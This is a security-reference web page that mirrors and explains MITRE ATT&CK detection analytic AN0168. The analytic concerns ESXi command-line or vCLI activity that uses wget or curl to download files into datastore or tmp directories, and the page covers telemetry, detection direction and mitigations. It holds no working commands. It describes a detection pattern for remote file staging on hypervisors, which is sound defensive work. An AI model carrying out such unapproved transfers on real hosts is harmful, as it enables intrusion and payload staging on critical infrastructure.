AN0168: Analytic 0168
Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories.
Analyst context for executives and security teams
This analytic points to a practical ESXi defense question: can the organization see remote file transfers initiated through command-line or vCLI activity when files are written into datastore paths or temporary directories? For leaders, the value is not the specific tool name, but whether virtualization infrastructure has enough logging and response readiness to distinguish legitimate administration from suspicious file staging or transfer behavior.
Executive priority
Prioritize this where ESXi hosts support critical business services. The business risk is visibility: if file transfer activity on hypervisor infrastructure is not logged, retained, and reviewed, incident responders may lack evidence needed to determine what changed, what was staged, and whether virtualization operations are at risk. Security leaders should ask whether ESXi administrative activity, datastore writes, and temporary-directory file creation are included in SOC monitoring and incident evidence requirements.
Technical view
The supplied ATT&CK analytic is limited to ESXi and describes command-line interface or vCLI activity that triggers remote transfer using wget or curl, with files written into datastore paths or local tmp directories. SOC and detection teams should validate whether ESXi command execution, vCLI/API-driven administration, process or shell history where available, and file write activity in datastore and temporary paths are observable. Because no official detection logic or tactic mapping is provided, local baselining is required to separate expected administrative downloads from unusual transfer patterns, unexpected destinations, or writes to sensitive virtualization storage locations.
Likely telemetry
- ESXi host logs related to shell, command-line, or administrative activity
- vCLI or remote administrative session logs
- Evidence of wget or curl execution where collected
- Datastore file creation or modification records where available
- Local temporary directory file write activity
Detection direction
- Confirm that ESXi administrative and command activity is collected centrally; many environments have weaker telemetry on hypervisors than on standard servers.
- Baseline legitimate administrator use of remote transfer utilities and vCLI-driven maintenance to reduce false positives.
- Look for remote transfer activity that writes to datastore paths or local tmp directories, especially when not associated with approved maintenance windows or known administrative accounts.
- Correlate file transfer evidence with ESXi authentication and management-session records to identify the initiating account and source system.
- Treat the absence of official detection logic as a validation gap: detection engineering should test available telemetry before assuming coverage.
Mitigation priorities
- Restrict ESXi administrative access to authorized users and managed administration paths.
- Limit or govern shell/vCLI usage according to operational need and change-control expectations.
- Centralize and retain ESXi management, authentication, and relevant file activity logs for incident response.
- Define approved maintenance workflows for downloading or staging files on ESXi hosts and datastores.
- Review monitoring coverage for datastore and temporary-directory writes on virtualization infrastructure.
Analyst notes and limits
This object is a detection analytic, not an ATT&CK technique. The supplied fields identify ESXi as the platform and describe remote transfer through CLI or vCLI using wget or curl with writes into datastore or tmp paths. No ATT&CK tactics, procedure examples, relationships, or official detection logic were supplied, so this take focuses on defensive validation and evidence readiness rather than asserting malicious intent.
The source provides a short description only. It does not specify detection query logic, required data sources, false-positive examples, related techniques, threat groups, campaigns, or observed exploitation. Local ESXi configuration, logging settings, administrative practices, and retention determine whether this behavior can be reliably detected.
Analytic 0168
Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 799e8d023401… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0168Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.